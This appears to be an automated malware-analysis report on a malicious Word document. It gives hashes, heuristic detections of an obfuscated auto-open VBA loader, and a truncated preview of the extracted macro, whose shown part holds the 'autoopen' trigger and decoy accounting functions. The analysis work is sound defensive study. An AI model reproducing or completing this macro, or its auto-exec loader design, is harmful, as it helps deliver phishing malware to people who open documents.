Office (OOXML) malware analysis — malicious · 25f52d0733644bae

MALICIOUS

Office (OOXML)

51.6 KB Created: 2016-05-17 12:58:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-09-04

MD5: ae308892f0a7d784cdc8bc4e8878faec SHA-1: e091115c835b129116606db68e6b489d91951df7 SHA-256: 25f52d0733644bae41ec079c69a5e3d9dc66c0887ba89a1a3e79c38fd2edb5d9

362 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This OOXML document contains a highly obfuscated VBA macro loader, indicated by multiple critical heuristic firings including 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and ClamAV detections. The 'autoopen' subroutine likely triggers the execution of malicious code, which is designed to download and execute a second-stage payload. The presence of VBA macros and the AutoOpen function strongly suggests a spearphishing attachment attack vector.

Heuristics 8

ClamAV: Doc.Macro.ObfuscatedData-6136276-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ObfuscatedData-6136276-0
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	27982 bytes
SHA-256: `0207304178dcd5c2819a10d32b55665891861d0c82ef2f24551d9f24ebf832b9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Function EjecutaSQL(ByRef SQL As String) As Boolean EjecutaSQL = False On Error Resume Next Conn.Execute SQL If Err.Number <> 0 Then Err.Clear Else EjecutaSQL = True End If End Function Public Function DirectorioEAT() As Boolean On Error GoTo EDirecEAT DirectorioEAT = False If Dir("C:\AEAT", vbDirectory) = "" Then MsgBox "No se encuentra la carpeta de la agencia tributaria. ( C:\AEAT )", vbExclamation Else DirectorioEAT = True End If Exit Function EDirecEAT: Err.Clear End Function Sub autoopen() EjecutaSQLDo 0.4, 5, -0.6 End Sub Public Function EstaLaCuentaBloqueada(ByRef codmacta As String, Fecha As Date) As Boolean Dim i As Integer EstaLaCuentaBloqueada = False If vParam.CuentasBloqueadas <> "" Then i = InStr(1, vParam.CuentasBloqueadas, codmacta & ":") If i > 0 Then If Fecha >= CDate(Mid(vParam.CuentasBloqueadas, i + Len(codmacta) + 1, 10)) Then EstaLaCuentaBloqueada = True End If End If End Function Public Sub CerrarRs(ByRef Rsss As String) On Error Resume Next Rsss.Close If Err.Number <> 0 Then Err.Clear End Sub Public Function SerieNumeroFactura(Posiciones As Integer, Serie As String, Numerofactura As String) Dim i As Integer Dim Cad As String i = Posiciones - Len(Numerofactura) - Len(Serie) If i <= 0 Then Cad = Right(Numerofactura, Posiciones - Len(Numerofactura)) Else Cad = String(i, "0") & Numerofactura End If SerieNumeroFactura = Serie & Cad End Function Public Function EsEntero(TEXTO As String) As Boolean Dim i As Integer Dim C As Integer Dim L As Integer Dim res As Boolean res = True EsEntero = False If Not IsNumeric(TEXTO) Then res = False Else C = 0 L = 1 Do i = InStr(L, TEXTO, ".") If i > 0 Then L = i + 1 C = C + 1 End If Loop Until i = 0 If C > 1 Then res = False If C = 0 Then L = 1 Do i = InStr(L, TEXTO, ",") If i > 0 Then L = i + 1 C = C + 1 End If Loop Until i = 0 If C > 1 Then res = False End If End If EsEntero = res End Function Attribute VB_Name = "Module6" Public Sub NombreSQL(ByRef CADENA As String) Dim J As Integer Dim i As Integer Dim Aux As String J = 1 Do i = InStr(J, CADENA, " If i > 0 Then Aux = Mid(CADENA, 1, i - 1) & "\" CADENA = Aux & Mid(CADENA, i) J = i + 2 End If Loop Until i = 0 End Sub Public Function DevNombreSQL(CADENA As String) As String Dim J As Integer Dim i As Integer Dim Aux As String J = 1 Do i = InStr(J, CADENA, " If i > 0 Then Aux = Mid(CADENA, 1, i - 1) & "\" CADENA = Aux & Mid(CADENA, i) J = i + 2 End If Loop Until i = 0 DevNombreSQL = CADENA End Function Attribute VB_Name = "Module2" Public Result__1 As Object Public Freddy_Result As Object Public Result__3 As Object Public MassiveA() As String Public Result__4 As String Public Result__Warning As String Public Result_sedming As Object Public Constant_4 As String Public constans_Result() As String Const INTERVAl_MILLIS_DO_EVENTS As Long = 100 Public Function newStringBuilder() As String newStringBuilder = "" End Funct ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	76288 bytes
SHA-256: `f6ed7cedb24df52fefae87ecc496eea7abfc450ff1fcc4804c04005a530c4809`
Detection ClamAV: Doc.Macro.ObfuscatedData-6136276-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.